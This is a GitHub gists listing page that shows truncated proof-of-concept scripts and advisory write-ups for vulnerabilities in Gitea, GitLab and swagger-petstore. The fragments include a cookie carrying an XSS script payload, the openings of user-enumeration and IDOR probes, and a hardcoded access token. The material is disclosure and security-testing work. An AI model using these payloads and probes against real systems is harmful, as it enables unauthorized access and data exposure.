Hec HouqiyuA
HouqiyuA
/ gist:1b5e3094d50be924b86910bd08b73c6a
Last active
April 29, 2025 09:11
gitea_insecure_access_control
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| # Target | |
| host = "192.168.126.129" | |
| port = 3000 | |
| base_url = f"http://{host}:{port}" | |
| # Original token from the sample |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| TARGET_URL = "http://GITEAHOST/" | |
| cookies = { | |
| 'lang': 'en-US"><script>alert("XSS")</script>' | |
| } |
HouqiyuA
/ gist:04f335b1b7df3bf3c5fdc1ea1f04e699
Created
April 25, 2025 10:57
gitlab-User_Enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| def test_user_enumeration(base_url, token, start_id=1, end_id=10): | |
| """ | |
| Test for user enumeration vulnerability by trying sequential user IDs | |
| :param base_url: Base API URL (e.g., 'http://192.168.126.129:9980') | |
| :param token: PRIVATE-TOKEN value | |
| :param start_id: Starting user ID to test | |
| :param end_id: Ending user ID to test |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from urllib.parse import urljoin | |
| # 配置目标地址和请求头 | |
| BASE_URL = "http://DEPLOYED_GITLAB_HOST" | |
| ENDPOINT = "/api/v4/user/keys" | |
| HEADERS = { | |
| "Accept": "application/json", | |
| "PRIVATE-TOKEN": "YOUR_TOKEN" | |
| } |
HouqiyuA
/ gist:9f3679797243cf06b1f6e70b6b7b9e1e
Created
April 25, 2025 03:37
gitlab-CWE:208(Observable Timing Discrepancy)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| def test_extended_vulnerabilities(): | |
| base_url = "http://GITLAB_HOST/api/v4/snippets" | |
| original_token = "7_pwYNpdf9HZAZr1pkEy" # valid token | |
| headers = { | |
| "Accept": "application/json", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| def test_idor_vulnerabilities(): | |
| host = "DEPLOYED_GITLAB_HOST" | |
| port = "DEPLOYED GITLAB_PORT" | |
| url = f"http://{host}:{port}/api/v4/ci/lint" | |
| headers = { |
HouqiyuA
/ gist:3c36f78e8de9f6a3cfb0959477c07443
Last active
November 11, 2025 06:04
Poc for Peststore Information Disclosure Vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Description]: | |
| An issue in petstore v1.0.7 allows a remote attacker to execute information disclosure via accessing a non-existent endpoint /cart. The server returns a 404-error page exposing sensitive information including the Servlet name (default) and server version. | |
| [Vulnerability Type]: | |
| Information Disclosure Vulnerability | |
| [Vendor of Product]: | |
| https://github.com/swagger-api/swagger-petstore | |
| [Affected Product Code Base]: |
HouqiyuA
/ gist:9d2c3f0ba075d01631aff879546e419c
Last active
September 11, 2025 09:15
xss_for_peststore
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Description]: | |
| Cross Site Scripting (XSS) vulnerability in petstore v1.0.7 allows a remote attacker to execute arbitrary code via a crafted script to the /api/v3/pet interface. | |
| [Vulnerability Type]: | |
| Cross Site Scripting (XSS) | |
| [Vendor of Product]: | |
| https://github.com/swagger-api/swagger-petstore | |
| [Affected Product Code Base]: |
HouqiyuA
/ gist:4efd1aac7c7c7ab0cd5db48d62541a74
Last active
September 11, 2025 09:19
Incorrect Access Control
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Description]: | |
| An issue in petstore v1.0.7 allows a remote attacker to perform arbitrary delete operations via the DELETE /pet/{petId} endpoint by bypassing API key authentication. | |
| [Vulnerability Type]: | |
| Incorrect Access Control | |
| [Vendor of Product]: | |
| https://github.com/swagger-api/swagger-petstore | |
| [Affected Product Code Base]: |
NewerOlder